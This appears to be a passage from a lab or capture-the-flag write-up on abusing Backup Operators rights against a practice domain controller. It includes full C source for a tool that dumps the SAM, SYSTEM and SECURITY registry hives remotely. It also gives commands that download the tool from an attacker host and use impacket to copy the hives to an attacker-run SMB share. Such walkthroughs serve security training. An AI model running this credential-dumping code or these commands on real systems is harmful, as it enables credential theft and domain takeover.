We now have the credentials of “Backup Admins” which are in the “Backup Operators” group. If we do not have a shell on the target system though.

One way to still proceed is a great tool by who4m1:

https://github.com/Wh04m1001/Random/blob/main/BackupOperators.cpp

#include <stdio.h>
#include <Windows.h>
 
void MakeToken() {
    HANDLE token;
    const char username[] = "<username>";
    const char password[] = "<password>";
    const char domain[] = "<domain>";
 
    if (LogonUserA(username, domain, password, LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_DEFAULT, &token) == 0) {
        printf("LogonUserA: %d\n", GetLastError());
        exit(0);
    }
    if (ImpersonateLoggedOnUser(token) == 0) {
        printf("ImpersonateLoggedOnUser: %d\n", GetLastError());
        exit(0);
    }
}
 
int main()
{
    HKEY hklm;
    HKEY hkey;
    DWORD result;
    const char* hives[] = { "SAM","SYSTEM","SECURITY" };
    const char* files[] = { "C:\\windows\\temp\\sam.hive","C:\\windows\\temp\\system.hive","C:\\windows\\temp\\security.hive" };
     
    //Uncomment if using alternate credentials.
    //MakeToken();
 
    result = RegConnectRegistryA("\\\\<computername>", HKEY_LOCAL_MACHINE,&hklm);
    if (result != 0) {
        printf("RegConnectRegistryW: %d\n", result);
        exit(0);
    }
    for (int i = 0; i < 3; i++) {
 
        printf("Dumping %s hive to %s\n", hives[i], files[i]);
        result = RegOpenKeyExA(hklm, hives[i], REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_READ, &hkey);
        if (result != 0) {
            printf("RegOpenKeyExA: %d\n", result);
            exit(0);
        }
        result = RegSaveKeyA(hkey, files[i], NULL);
        if (result != 0) {
            printf("RegSaveKeyA: %d\n", result);
            exit(0);
        }
    }
}

This allows us to connect to the remote registry and use our Backup Operators privileges to copy out SAM/SYSTEM/SECURITY from DC to another machine. In order to use the tool we compile it with Visual Studio & upload it to anther machine. Then we dump the files from the registry on the dc, to “\windows\temp” on the dc:

 iwr <http://10.8.0.2/SeRemoteBackup.exe> -outfile SeRemoteBackup.exe
 .\SeRemoteBackup.exe
Dumping SAM hive to C:\windows\temp\sam.hive
Dumping SYSTEM hive to C:\windows\temp\system.hive
Dumping SECURITY hive to C:\windows\temp\security.hive

OR

Using reg.py from impacket which is for querying remote registry, we can dump SAM, SYSTEM and SECURITY files from registry hive

reg.py lustrous.vl/tony.ward:[email protected] save -keyName 'HKLM\SAM' -o '\\10.8.0.27\smb'
reg.py lustrous.vl/tony.ward:[email protected] save -keyName 'HKLM\SYSTEM' -o '\\10.8.0.27\smb'
reg.py lustrous.vl/tony.ward:[email protected] save -keyName 'HKLM\SECURITY' -o '\\10.8.0.27\smb'

Untitled

impacket-smbserver -smb2support smb .

Untitled